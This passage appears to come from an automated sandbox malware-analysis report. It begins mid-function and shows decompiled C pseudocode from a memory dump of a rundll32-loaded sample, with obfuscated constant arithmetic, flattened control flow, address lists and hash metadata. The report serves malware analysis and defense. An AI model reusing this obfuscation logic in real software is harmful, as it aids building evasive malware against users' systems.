                                                                                                                    										E0033DF6F(_v120, _v176, _v128, _v16, _v184, _v136, _t489);
                                                                                                                    										_t491 =  &(_t491[5]);
                                                                                                                    										goto L16;
                                                                                                                    									} else {
                                                                                                                    										if(_t485 != 0xe60f9b1) {
                                                                                                                    											goto L31;
                                                                                                                    										} else {
                                                                                                                    											_push(_t434);
                                                                                                                    											_push(_t434);
                                                                                                                    											_t400 = E00337FF2(0x20000);
                                                                                                                    											_t421 = 0xd1a593f;
                                                                                                                    											if(0xd1a593f != 0) {
                                                                                                                    												_t485 = 0xaf524c8;
                                                                                                                    												goto L17;
                                                                                                                    											}
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    							goto L34;
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    			}









































































                                                                                                                    0x0033d8b1
                                                                                                                    0x0033d8b9
                                                                                                                    0x0033d8c1
                                                                                                                    0x0033d8cb
                                                                                                                    0x0033d8d9
                                                                                                                    0x0033d8de
                                                                                                                    0x0033d8e7
                                                                                                                    0x0033d8f2
                                                                                                                    0x0033d8fa
                                                                                                                    0x0033d902
                                                                                                                    0x0033d907
                                                                                                                    0x0033d90c
                                                                                                                    0x0033d914
                                                                                                                    0x0033d91c
                                                                                                                    0x0033d921
                                                                                                                    0x0033d926
                                                                                                                    0x0033d92e
                                                                                                                    0x0033d936
                                                                                                                    0x0033d93e
                                                                                                                    0x0033d946
                                                                                                                    0x0033d952
                                                                                                                    0x0033d957
                                                                                                                    0x0033d95d
                                                                                                                    0x0033d965
                                                                                                                    0x0033d970
                                                                                                                    0x0033d978
                                                                                                                    0x0033d983
                                                                                                                    0x0033d98e
                                                                                                                    0x0033d999
                                                                                                                    0x0033d9a4
                                                                                                                    0x0033d9b6
                                                                                                                    0x0033d9bb
                                                                                                                    0x0033d9c4
                                                                                                                    0x0033d9cf
                                                                                                                    0x0033d9da
                                                                                                                    0x0033d9e5
                                                                                                                    0x0033d9f0
                                                                                                                    0x0033d9f8
                                                                                                                    0x0033da00
                                                                                                                    0x0033da08
                                                                                                                    0x0033da1a
                                                                                                                    0x0033da1f
                                                                                                                    0x0033da28
                                                                                                                    0x0033da33
                                                                                                                    0x0033da3b
                                                                                                                    0x0033da43
                                                                                                                    0x0033da4b
                                                                                                                    0x0033da53
                                                                                                                    0x0033da5b
                                                                                                                    0x0033da60
                                                                                                                    0x0033da68
                                                                                                                    0x0033da73
                                                                                                                    0x0033da7b
                                                                                                                    0x0033da86
                                                                                                                    0x0033da93
                                                                                                                    0x0033da94
                                                                                                                    0x0033da9e
                                                                                                                    0x0033daa2
                                                                                                                    0x0033daaa
                                                                                                                    0x0033dab5
                                                                                                                    0x0033dabd
                                                                                                                    0x0033dac8
                                                                                                                    0x0033dad0
                                                                                                                    0x0033dada
                                                                                                                    0x0033dadf
                                                                                                                    0x0033dae7
                                                                                                                    0x0033daef
                                                                                                                    0x0033db03
                                                                                                                    0x0033db08
                                                                                                                    0x0033db0f
                                                                                                                    0x0033db16
                                                                                                                    0x0033db21
                                                                                                                    0x0033db2c
                                                                                                                    0x0033db34
                                                                                                                    0x0033db3f
                                                                                                                    0x0033db47
                                                                                                                    0x0033db52
                                                                                                                    0x0033db57
                                                                                                                    0x0033db5b
                                                                                                                    0x0033db63
                                                                                                                    0x0033db6b
                                                                                                                    0x0033db76
                                                                                                                    0x0033db81
                                                                                                                    0x0033db8c
                                                                                                                    0x0033db97
                                                                                                                    0x0033db9f
                                                                                                                    0x0033dbaa
                                                                                                                    0x0033dbb2
                                                                                                                    0x0033dbb7
                                                                                                                    0x0033dbbc
                                                                                                                    0x0033dbc4
                                                                                                                    0x0033dbcc
                                                                                                                    0x0033dbd4
                                                                                                                    0x0033dbdc
                                                                                                                    0x0033dbe4
                                                                                                                    0x0033dbec
                                                                                                                    0x0033dbf4
                                                                                                                    0x0033dbf9
                                                                                                                    0x0033dbfe
                                                                                                                    0x0033dc02
                                                                                                                    0x0033dc0a
                                                                                                                    0x0033dc12
                                                                                                                    0x0033dc1a
                                                                                                                    0x0033dc22
                                                                                                                    0x0033dc2a
                                                                                                                    0x0033dc32
                                                                                                                    0x0033dc3a
                                                                                                                    0x0033dc42
                                                                                                                    0x0033dc4a
                                                                                                                    0x0033dc52
                                                                                                                    0x0033dc5a
                                                                                                                    0x0033dc65
                                                                                                                    0x0033dc70
                                                                                                                    0x0033dc7b
                                                                                                                    0x0033dc89
                                                                                                                    0x0033dc91
                                                                                                                    0x0033dc95
                                                                                                                    0x0033dc9a
                                                                                                                    0x0033dca2
                                                                                                                    0x0033dca2
                                                                                                                    0x0033dca2
                                                                                                                    0x0033dca6
                                                                                                                    0x0033dca6
                                                                                                                    0x0033dcaa
                                                                                                                    0x0033dcaa
                                                                                                                    0x0033dcaa
                                                                                                                    0x0033dcb0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033dcb6
                                                                                                                    0x0033dcb6
                                                                                                                    0x0033de66
                                                                                                                    0x0033de6c
                                                                                                                    0x00000000
                                                                                                                    0x0033dcbc
                                                                                                                    0x0033dcc2
                                                                                                                    0x00000000
                                                                                                                    0x0033df63
                                                                                                                    0x0033dcce
                                                                                                                    0x0033de01
                                                                                                                    0x0033de05
                                                                                                                    0x0033de0a
                                                                                                                    0x0033de0f
                                                                                                                    0x0033de52
                                                                                                                    0x0033de52
                                                                                                                    0x0033de57
                                                                                                                    0x0033de57
                                                                                                                    0x0033de11
                                                                                                                    0x0033de1f
                                                                                                                    0x0033de27
                                                                                                                    0x0033de39
                                                                                                                    0x0033de3d
                                                                                                                    0x0033de41
                                                                                                                    0x0033de41
                                                                                                                    0x0033de44
                                                                                                                    0x0033de48
                                                                                                                    0x00000000
                                                                                                                    0x0033dcd4
                                                                                                                    0x0033dcd6
                                                                                                                    0x0033dd6a
                                                                                                                    0x0033dd91
                                                                                                                    0x0033dd9b
                                                                                                                    0x0033dda0
                                                                                                                    0x0033df40
                                                                                                                    0x0033df40
                                                                                                                    0x00000000
                                                                                                                    0x0033dcd8
                                                                                                                    0x0033dcde
                                                                                                                    0x0033dd31
                                                                                                                    0x00000000
                                                                                                                    0x0033dce0
                                                                                                                    0x0033dce6
                                                                                                                    0x0033df45
                                                                                                                    0x0033df4b
                                                                                                                    0x00000000
                                                                                                                    0x0033df4d
                                                                                                                    0x0033dcec
                                                                                                                    0x0033dd14
                                                                                                                    0x0033dd16
                                                                                                                    0x0033dd1b
                                                                                                                    0x0033dd24
                                                                                                                    0x0033dd29
                                                                                                                    0x0033dca6
                                                                                                                    0x0033dcaa
                                                                                                                    0x0033dcaa
                                                                                                                    0x0033dcaa
                                                                                                                    0x0033dcb0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033dcb0
                                                                                                                    0x00000000
                                                                                                                    0x0033dcaa
                                                                                                                    0x0033dce6
                                                                                                                    0x0033dcde
                                                                                                                    0x0033dcd6
                                                                                                                    0x0033dcce
                                                                                                                    0x0033df6e
                                                                                                                    0x0033df6e
                                                                                                                    0x0033de73
                                                                                                                    0x0033de79
                                                                                                                    0x0033df22
                                                                                                                    0x0033df23
                                                                                                                    0x0033df24
                                                                                                                    0x0033df29
                                                                                                                    0x0033df2f
                                                                                                                    0x0033df3b
                                                                                                                    0x00000000
                                                                                                                    0x0033df31
                                                                                                                    0x0033df31
                                                                                                                    0x00000000
                                                                                                                    0x0033df31
                                                                                                                    0x0033de7f
                                                                                                                    0x0033de85
                                                                                                                    0x0033def6
                                                                                                                    0x0033defb
                                                                                                                    0x0033df03
                                                                                                                    0x00000000
                                                                                                                    0x0033de87
                                                                                                                    0x0033de87

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 6#d$6>V$7R$C%$Ed;$nq$udo
                                                                                                                    • API String ID: 0-652707834
                                                                                                                    • Opcode ID: f1ebdc49b849bf8c904815538ebaa2ee5cbb6585970c67cf9760e8e328c8f8b3
                                                                                                                    • Instruction ID: 29e61a634a66291d426ef9a8c2c1193f29dfaefcc621e9083c815aec524bb43b
                                                                                                                    • Opcode Fuzzy Hash: f1ebdc49b849bf8c904815538ebaa2ee5cbb6585970c67cf9760e8e328c8f8b3
                                                                                                                    • Instruction Fuzzy Hash: 5312317250C3809FD369DF25D88AA5FBBE2BBC4344F108A1DE5C98A260D7B19949CF53
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 98%
                                                                                                                    			E003381B7() {
                                                                                                                    				void* _t347;
                                                                                                                    				signed int _t350;
                                                                                                                    				signed int _t351;
                                                                                                                    				signed int _t353;
                                                                                                                    				signed int _t355;
                                                                                                                    				signed int _t360;
                                                                                                                    				signed int _t364;
                                                                                                                    				void* _t374;
                                                                                                                    				intOrPtr _t407;
                                                                                                                    				signed int _t411;
                                                                                                                    				signed int _t414;
                                                                                                                    				signed int _t415;
                                                                                                                    				signed int _t416;
                                                                                                                    				signed int _t417;
                                                                                                                    				signed int _t418;
                                                                                                                    				signed int _t419;
                                                                                                                    				signed int _t420;
                                                                                                                    				signed int* _t422;
                                                                                                                    				void* _t426;
                                                                                                                    
                                                                                                                    				 *(_t426 + 0x74) = 0xd212a7;
                                                                                                                    				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x52eac678;
                                                                                                                    				_t374 = 0xebf23c2;
                                                                                                                    				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x5238d4de;
                                                                                                                    				 *(_t426 + 0x20) = 0x60274e;
                                                                                                                    				 *(_t426 + 0x20) =  *(_t426 + 0x20) >> 4;
                                                                                                                    				_t414 = 0x29;
                                                                                                                    				 *(_t426 + 0x34) =  *(_t426 + 0x20) / _t414;
                                                                                                                    				 *(_t426 + 0x34) =  *(_t426 + 0x34) + 0x7a4c;
                                                                                                                    				 *(_t426 + 0x34) =  *(_t426 + 0x34) ^ 0x00009fd0;
                                                                                                                    				 *(_t426 + 0x9c) = 0x5f71eb;
                                                                                                                    				 *(_t426 + 0x9c) =  *(_t426 + 0x9c) ^ 0x01156387;
                                                                                                                    				 *(_t426 + 0x9c) =  *(_t426 + 0x9c) ^ 0x014a126f;
                                                                                                                    				 *(_t426 + 0x1c) = 0x8735e4;
                                                                                                                    				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) >> 0xe;
                                                                                                                    				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 3;
                                                                                                                    				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) >> 4;
                                                                                                                    				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) ^ 0x000153b5;
                                                                                                                    				 *(_t426 + 0x58) = 0x9ed5c5;
                                                                                                                    				_t415 = 0x17;
                                                                                                                    				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) & 0x00000000;
                                                                                                                    				 *(_t426 + 0x54) =  *(_t426 + 0x58) * 0x5d;
                                                                                                                    				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0xb1e1bce9;
                                                                                                                    				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0x88583d56;
                                                                                                                    				 *(_t426 + 0x5c) = 0x8fe0dc;
                                                                                                                    				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) + 0xffff3edc;
                                                                                                                    				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) / _t415;
                                                                                                                    				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) ^ 0x00095c01;
                                                                                                                    				 *(_t426 + 0x48) = 0x18253c;
                                                                                                                    				 *(_t426 + 0x48) =  *(_t426 + 0x48) + 0xf9f1;
                                                                                                                    				 *(_t426 + 0x48) =  *(_t426 + 0x48) << 7;
                                                                                                                    				 *(_t426 + 0x48) =  *(_t426 + 0x48) ^ 0x0c842cab;
                                                                                                                    				 *(_t426 + 0x94) = 0x40d4a3;
                                                                                                                    				 *(_t426 + 0x94) =  *(_t426 + 0x94) << 5;
                                                                                                                    				 *(_t426 + 0x94) =  *(_t426 + 0x94) ^ 0x081e10bd;
                                                                                                                    				 *(_t426 + 0x20) = 0x8fc5ff;
                                                                                                                    				 *(_t426 + 0x20) =  *(_t426 + 0x20) >> 4;
                                                                                                                    				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0x245daa70;
                                                                                                                    				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0xfc587561;
                                                                                                                    				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0xd80c07a2;
                                                                                                                    				 *(_t426 + 0x38) = 0x52431;
                                                                                                                    				 *(_t426 + 0x38) =  *(_t426 + 0x38) * 0x31;
                                                                                                                    				 *(_t426 + 0x38) =  *(_t426 + 0x38) ^ 0xfa9954a0;
                                                                                                                    				 *(_t426 + 0x38) =  *(_t426 + 0x38) + 0xffff6dd1;
                                                                                                                    				 *(_t426 + 0x38) =  *(_t426 + 0x38) ^ 0xfa6f2662;
                                                                                                                    				 *(_t426 + 0x44) = 0xc4652;
                                                                                                                    				 *(_t426 + 0x44) =  *(_t426 + 0x44) + 0xffff61fe;
                                                                                                                    				 *(_t426 + 0x44) =  *(_t426 + 0x44) >> 4;
                                                                                                                    				 *(_t426 + 0x44) =  *(_t426 + 0x44) ^ 0x0000c191;
                                                                                                                    				 *(_t426 + 0x10) = 0x2c06e;
                                                                                                                    				 *(_t426 + 0x10) =  *(_t426 + 0x10) + 0xffffb3fc;
                                                                                                                    				 *(_t426 + 0x10) =  *(_t426 + 0x10) * 0x27;
                                                                                                                    				 *(_t426 + 0x10) =  *(_t426 + 0x10) + 0xbfb5;
                                                                                                                    				 *(_t426 + 0x10) =  *(_t426 + 0x10) ^ 0x00679be9;
                                                                                                                    				 *(_t426 + 0x7c) = 0xc3ec9d;
                                                                                                                    				 *(_t426 + 0x7c) =  *(_t426 + 0x7c) << 7;
                                                                                                                    				 *(_t426 + 0x7c) =  *(_t426 + 0x7c) ^ 0x61f5edc1;
                                                                                                                    				 *(_t426 + 0x70) = 0x3416d6;
                                                                                                                    				 *(_t426 + 0x70) =  *(_t426 + 0x70) << 3;
                                                                                                                    				 *(_t426 + 0x70) =  *(_t426 + 0x70) ^ 0x01aaf790;
                                                                                                                    				 *(_t426 + 0x64) = 0x1e8df6;
                                                                                                                    				 *(_t426 + 0x64) =  *(_t426 + 0x64) | 0x232ea122;
                                                                                                                    				 *(_t426 + 0x64) =  *(_t426 + 0x64) * 0x6c;
                                                                                                                    				 *(_t426 + 0x64) =  *(_t426 + 0x64) ^ 0xde707d95;
                                                                                                                    				 *(_t426 + 0x28) = 0xebc79e;
                                                                                                                    				 *(_t426 + 0x28) =  *(_t426 + 0x28) | 0xfe2cd41a;
                                                                                                                    				 *(_t426 + 0x28) =  *(_t426 + 0x28) + 0xffff955f;
                                                                                                                    				 *(_t426 + 0x28) =  *(_t426 + 0x28) + 0xf79a;
                                                                                                                    				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0xfef90bb7;
                                                                                                                    				 *(_t426 + 0x4c) = 0x6795aa;
                                                                                                                    				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) >> 5;
                                                                                                                    				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) + 0xffffddd4;
                                                                                                                    				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) ^ 0x0005ee09;
                                                                                                                    				 *(_t426 + 0x50) = 0xbc4be8;
                                                                                                                    				 *(_t426 + 0x50) =  *(_t426 + 0x50) ^ 0xc40dbfb1;
                                                                                                                    				_t416 = 0x6f;
                                                                                                                    				 *(_t426 + 0x54) =  *(_t426 + 0x50) * 0x3a;
                                                                                                                    				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0x9054da47;
                                                                                                                    				 *(_t426 + 0x94) = 0xde468f;
                                                                                                                    				 *(_t426 + 0x94) =  *(_t426 + 0x94) + 0xffff1011;
                                                                                                                    				 *(_t426 + 0x94) =  *(_t426 + 0x94) ^ 0x00dd868e;
                                                                                                                    				 *(_t426 + 0x18) = 0x6e4fa6;
                                                                                                                    				 *(_t426 + 0x18) =  *(_t426 + 0x18) >> 8;
                                                                                                                    				 *(_t426 + 0x18) =  *(_t426 + 0x18) ^ 0x937c1de8;
                                                                                                                    				 *(_t426 + 0x18) =  *(_t426 + 0x18) | 0x0d58262f;
                                                                                                                    				 *(_t426 + 0x18) =  *(_t426 + 0x18) ^ 0x9f7b4471;
                                                                                                                    				 *(_t426 + 0x5c) = 0xc77145;
                                                                                                                    				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) + 0x9c58;
                                                                                                                    				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) / _t416;
                                                                                                                    				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) ^ 0x0006cc79;
                                                                                                                    				 *(_t426 + 0x44) = 0x492c53;
                                                                                                                    				 *(_t426 + 0x44) =  *(_t426 + 0x44) | 0x932025a2;
                                                                                                                    				 *(_t426 + 0x44) =  *(_t426 + 0x44) << 0xb;
                                                                                                                    				 *(_t426 + 0x44) =  *(_t426 + 0x44) ^ 0x496991d6;
                                                                                                                    				 *(_t426 + 0xa0) = 0x27589;
                                                                                                                    				_t417 = 0x3e;
                                                                                                                    				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) * 0x6d;
                                                                                                                    				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) ^ 0x010c563c;
                                                                                                                    				 *(_t426 + 0x30) = 0xb4bbc8;
                                                                                                                    				 *(_t426 + 0x30) =  *(_t426 + 0x30) / _t417;
                                                                                                                    				 *(_t426 + 0x30) =  *(_t426 + 0x30) + 0xffff42d9;
                                                                                                                    				 *(_t426 + 0x30) =  *(_t426 + 0x30) + 0x5120;
                                                                                                                    				 *(_t426 + 0x30) =  *(_t426 + 0x30) ^ 0x000b6c85;
                                                                                                                    				 *(_t426 + 0x28) = 0xdf5b34;
                                                                                                                    				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0xb2734269;
                                                                                                                    				_t418 = 0x5e;
                                                                                                                    				 *(_t426 + 0x28) =  *(_t426 + 0x28) / _t418;
                                                                                                                    				 *(_t426 + 0x28) =  *(_t426 + 0x28) << 6;
                                                                                                                    				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0x79ab34c2;
                                                                                                                    				 *(_t426 + 0x90) = 0xff684d;
                                                                                                                    				 *(_t426 + 0x90) =  *(_t426 + 0x90) | 0x9d6c2ae6;
                                                                                                                    				 *(_t426 + 0x90) =  *(_t426 + 0x90) ^ 0x9df0e455;
                                                                                                                    				 *(_t426 + 0x20) = 0x90e304;
                                                                                                                    				_t419 = 0x7f;
                                                                                                                    				 *(_t426 + 0x1c) =  *(_t426 + 0x20) / _t419;
                                                                                                                    				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 6;
                                                                                                                    				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 0x10;
                                                                                                                    				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) ^ 0x0384731e;
                                                                                                                    				 *(_t426 + 0x60) = 0xa4eb1a;
                                                                                                                    				 *(_t426 + 0x60) =  *(_t426 + 0x60) << 0xc;
                                                                                                                    				 *(_t426 + 0x60) =  *(_t426 + 0x60) * 0x76;
                                                                                                                    				 *(_t426 + 0x60) =  *(_t426 + 0x60) ^ 0x45d23c3b;
                                                                                                                    				 *(_t426 + 0x34) = 0xdaab0d;
                                                                                                                    				 *(_t426 + 0x34) =  *(_t426 + 0x34) << 0xb;
                                                                                                                    				 *(_t426 + 0x34) =  *(_t426 + 0x34) + 0xdf07;
                                                                                                                    				 *(_t426 + 0x34) =  *(_t426 + 0x34) << 3;
                                                                                                                    				 *(_t426 + 0x34) =  *(_t426 + 0x34) ^ 0xaac3765a;
                                                                                                                    				 *(_t426 + 0x68) = 0xbbaf5f;
                                                                                                                    				 *(_t426 + 0x68) =  *(_t426 + 0x68) >> 3;
                                                                                                                    				_t372 =  *(_t426 + 0x6c);
                                                                                                                    				_t411 =  *(_t426 + 0x6c);
                                                                                                                    				_t424 =  *(_t426 + 0x6c);
                                                                                                                    				_t420 =  *(_t426 + 0x6c);
                                                                                                                    				 *(_t426 + 0x68) =  *(_t426 + 0x68) * 0x7d;
                                                                                                                    				 *(_t426 + 0x68) =  *(_t426 + 0x68) ^ 0x0b7165e1;
                                                                                                                    				 *(_t426 + 0x74) = 0xfd4b1c;
                                                                                                                    				 *(_t426 + 0x74) =  *(_t426 + 0x74) + 0x7fb7;
                                                                                                                    				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x00f7158e;
                                                                                                                    				 *(_t426 + 0x88) = 0xbb9d8e;
                                                                                                                    				 *(_t426 + 0x88) =  *(_t426 + 0x88) * 0x48;
                                                                                                                    				 *(_t426 + 0x88) =  *(_t426 + 0x88) ^ 0x34cbdce1;
                                                                                                                    				 *(_t426 + 0x3c) = 0x9303e6;
                                                                                                                    				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) << 0xf;
                                                                                                                    				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) ^ 0xad47a309;
                                                                                                                    				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) * 0x3d;
                                                                                                                    				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) ^ 0xa7019983;
                                                                                                                    				 *(_t426 + 0x80) = 0xaf4918;
                                                                                                                    				 *(_t426 + 0x80) =  *(_t426 + 0x80) + 0x655a;
                                                                                                                    				 *(_t426 + 0x80) =  *(_t426 + 0x80) ^ 0x00a67f7b;
                                                                                                                    				 *(_t426 + 0x78) = 0xd8d1b1;
                                                                                                                    				 *(_t426 + 0x78) =  *(_t426 + 0x78) * 0x42;
                                                                                                                    				 *(_t426 + 0x78) =  *(_t426 + 0x78) ^ 0x37ebe9ce;
                                                                                                                    				while(1) {
                                                                                                                    					L1:
                                                                                                                    					_t347 = 0xfb52c5;
                                                                                                                    					L2:
                                                                                                                    					while(_t374 != 0xd963e9) {
                                                                                                                    						if(_t374 == _t347) {
                                                                                                                    							_t350 = E0034C264( *((intOrPtr*)(_t426 + 0xbc)), _t372,  *(_t426 + 0x3c), _t426 + 0xac,  *((intOrPtr*)(_t426 + 0xa4)), _t374, _t374, _t420,  *(_t426 + 0x68), _t374,  *(_t426 + 0x48),  *(_t426 + 0xa0), _t411);
                                                                                                                    							_t426 = _t426 + 0x2c;
                                                                                                                    							__eflags = _t350;
                                                                                                                    							if(_t350 == 0) {
                                                                                                                    								_t351 =  *(_t426 + 0xa0);
                                                                                                                    							} else {
                                                                                                                    								_t422 = _t411;
                                                                                                                    								while(1) {
                                                                                                                    									__eflags = _t422[1] - 4;
                                                                                                                    									if(_t422[1] != 4) {
                                                                                                                    										goto L20;
                                                                                                                    									}
                                                                                                                    									L19:
                                                                                                                    									_t355 = E0033B23C( *(_t426 + 0x38),  *(_t426 + 0x30), _t424,  *(_t426 + 0x94),  *(_t426 + 0x20),  &(_t422[3]));
                                                                                                                    									_t426 = _t426 + 0x10;
                                                                                                                    									__eflags = _t355;
                                                                                                                    									if(_t355 == 0) {
                                                                                                                    										_t351 = 1;
                                                                                                                    										 *(_t426 + 0xa0) = 1;
                                                                                                                    									} else {
                                                                                                                    										goto L20;
                                                                                                                    									}
                                                                                                                    									L25:
                                                                                                                    									_t420 =  *(_t426 + 0x6c);
                                                                                                                    									goto L26;
                                                                                                                    									L20:
                                                                                                                    									_t353 =  *_t422;
                                                                                                                    									__eflags = _t353;
                                                                                                                    									if(_t353 == 0) {
                                                                                                                    										_t351 =  *(_t426 + 0xa0);
                                                                                                                    									} else {
                                                                                                                    										_t422 = _t422 + _t353;
                                                                                                                    										__eflags = _t422[1] - 4;
                                                                                                                    										if(_t422[1] != 4) {
                                                                                                                    											goto L20;
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    									goto L25;
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    							L26:
                                                                                                                    							__eflags = _t351;
                                                                                                                    							if(__eflags == 0) {
                                                                                                                    								_t347 = 0xfb52c5;
                                                                                                                    								_t374 = 0xfb52c5;
                                                                                                                    								continue;
                                                                                                                    							} else {
                                                                                                                    								_t407 =  *0x353e0c; // 0x0
                                                                                                                    								E0034458F( *(_t426 + 0x64),  *((intOrPtr*)(_t407 + 8)),  *(_t426 + 0x34));
                                                                                                                    								_t374 = 0xd963e9;
                                                                                                                    								goto L1;
                                                                                                                    							}
                                                                                                                    							L32:
                                                                                                                    						} else {
                                                                                                                    							if(_t374 == 0x247652d) {
                                                                                                                    								_t360 = E00338F65( *(_t426 + 0x68),  *(_t426 + 0x34), _t426 + 0xb4,  *(_t426 + 0x9c), 0x2000000, _t374, 1,  *(_t426 + 0x80),  *((intOrPtr*)(_t426 + 0xa4)),  *(_t426 + 0x6c), _t374,  *(_t426 + 0x30) | 0x00000006);
                                                                                                                    								_t372 = _t360;
                                                                                                                    								_t426 = _t426 + 0x28;
                                                                                                                    								__eflags = _t360 - 0xffffffff;
                                                                                                                    								if(__eflags != 0) {
                                                                                                                    									_t374 = 0x7db0050;
                                                                                                                    									while(1) {
                                                                                                                    										L1:
                                                                                                                    										_t347 = 0xfb52c5;
                                                                                                                    										goto L2;
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							} else {
                                                                                                                    								if(_t374 == 0x4334ccc) {
                                                                                                                    									E0034DA22( *(_t426 + 0x28),  *(_t426 + 0x64), __eflags,  *(_t426 + 0x68), _t426 + 0xac, _t374,  *(_t426 + 0x48));
                                                                                                                    									_t364 = E0033B6CF(_t426 + 0xbc,  *((intOrPtr*)(_t426 + 0xac)),  *(_t426 + 0x34),  *(_t426 + 0x48));
                                                                                                                    									_t424 = _t364;
                                                                                                                    									_t426 = _t426 + 0x18;
                                                                                                                    									_t374 = 0x247652d;
                                                                                                                    									 *((short*)(_t364 - 2)) = 0;
                                                                                                                    									while(1) {
                                                                                                                    										L1:
                                                                                                                    										_t347 = 0xfb52c5;
                                                                                                                    										goto L2;
                                                                                                                    									}
                                                                                                                    								} else {
                                                                                                                    									if(_t374 == 0x7db0050) {
                                                                                                                    										_t420 = 0x1000;
                                                                                                                    										_push(_t374);
                                                                                                                    										_push(_t374);
                                                                                                                    										 *(_t426 + 0x74) = 0x1000;
                                                                                                                    										_t411 = E00337FF2(0x1000);
                                                                                                                    										_t347 = 0xfb52c5;
                                                                                                                    										__eflags = _t411;
                                                                                                                    										_t374 = (_t411 != 0) ? 0xfb52c5 : 0xf828486;
                                                                                                                    										continue;
                                                                                                                    									} else {
                                                                                                                    										if(_t374 == 0xebf23c2) {
                                                                                                                    											_t374 = 0x4334ccc;
                                                                                                                    											continue;
                                                                                                                    										} else {
                                                                                                                    											if(_t374 != 0xf828486) {
                                                                                                                    												L30:
                                                                                                                    												__eflags = _t374 - 0x24bb42a;
                                                                                                                    												if(__eflags != 0) {
                                                                                                                    													continue;
                                                                                                                    												} else {
                                                                                                                    												}
                                                                                                                    											} else {
                                                                                                                    												E00341E67( *(_t426 + 0x94),  *(_t426 + 0x48),  *(_t426 + 0x88),  *(_t426 + 0x7c), _t372);
                                                                                                                    											}
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						return 0;
                                                                                                                    						goto L32;
                                                                                                                    					}
                                                                                                                    					E00348519( *(_t426 + 0x68),  *(_t426 + 0x74), _t411);
                                                                                                                    					_t374 = 0xf828486;
                                                                                                                    					_t347 = 0xfb52c5;
                                                                                                                    					goto L30;
                                                                                                                    				}
                                                                                                                    			}






















                                                                                                                    0x003385c0
                                                                                                                    0x003385c4
                                                                                                                    0x003385c8
                                                                                                                    0x003385cc
                                                                                                                    0x003385d0
                                                                                                                    0x003385d4
                                                                                                                    0x003385dc
                                                                                                                    0x003385e4
                                                                                                                    0x003385ec
                                                                                                                    0x003385f4
                                                                                                                    0x00338607
                                                                                                                    0x0033860e
                                                                                                                    0x00338619
                                                                                                                    0x00338621
                                                                                                                    0x00338626
                                                                                                                    0x00338633
                                                                                                                    0x00338637
                                                                                                                    0x0033863f
                                                                                                                    0x0033864a
                                                                                                                    0x00338655
                                                                                                                    0x00338660
                                                                                                                    0x0033866d
                                                                                                                    0x00338671
                                                                                                                    0x00338679
                                                                                                                    0x00338679
                                                                                                                    0x00338679
                                                                                                                    0x00000000
                                                                                                                    0x0033867e
                                                                                                                    0x0033868c
                                                                                                                    0x00338806
                                                                                                                    0x0033880b
                                                                                                                    0x0033880e
                                                                                                                    0x00338810
                                                                                                                    0x00338854
                                                                                                                    0x00338812
                                                                                                                    0x00338812
                                                                                                                    0x00338814
                                                                                                                    0x00338814
                                                                                                                    0x00338818
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033881a
                                                                                                                    0x00338832
                                                                                                                    0x00338837
                                                                                                                    0x0033883a
                                                                                                                    0x0033883c
                                                                                                                    0x0033884a
                                                                                                                    0x0033884b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00338864
                                                                                                                    0x00338864
                                                                                                                    0x00000000
                                                                                                                    0x0033883e
                                                                                                                    0x0033883e
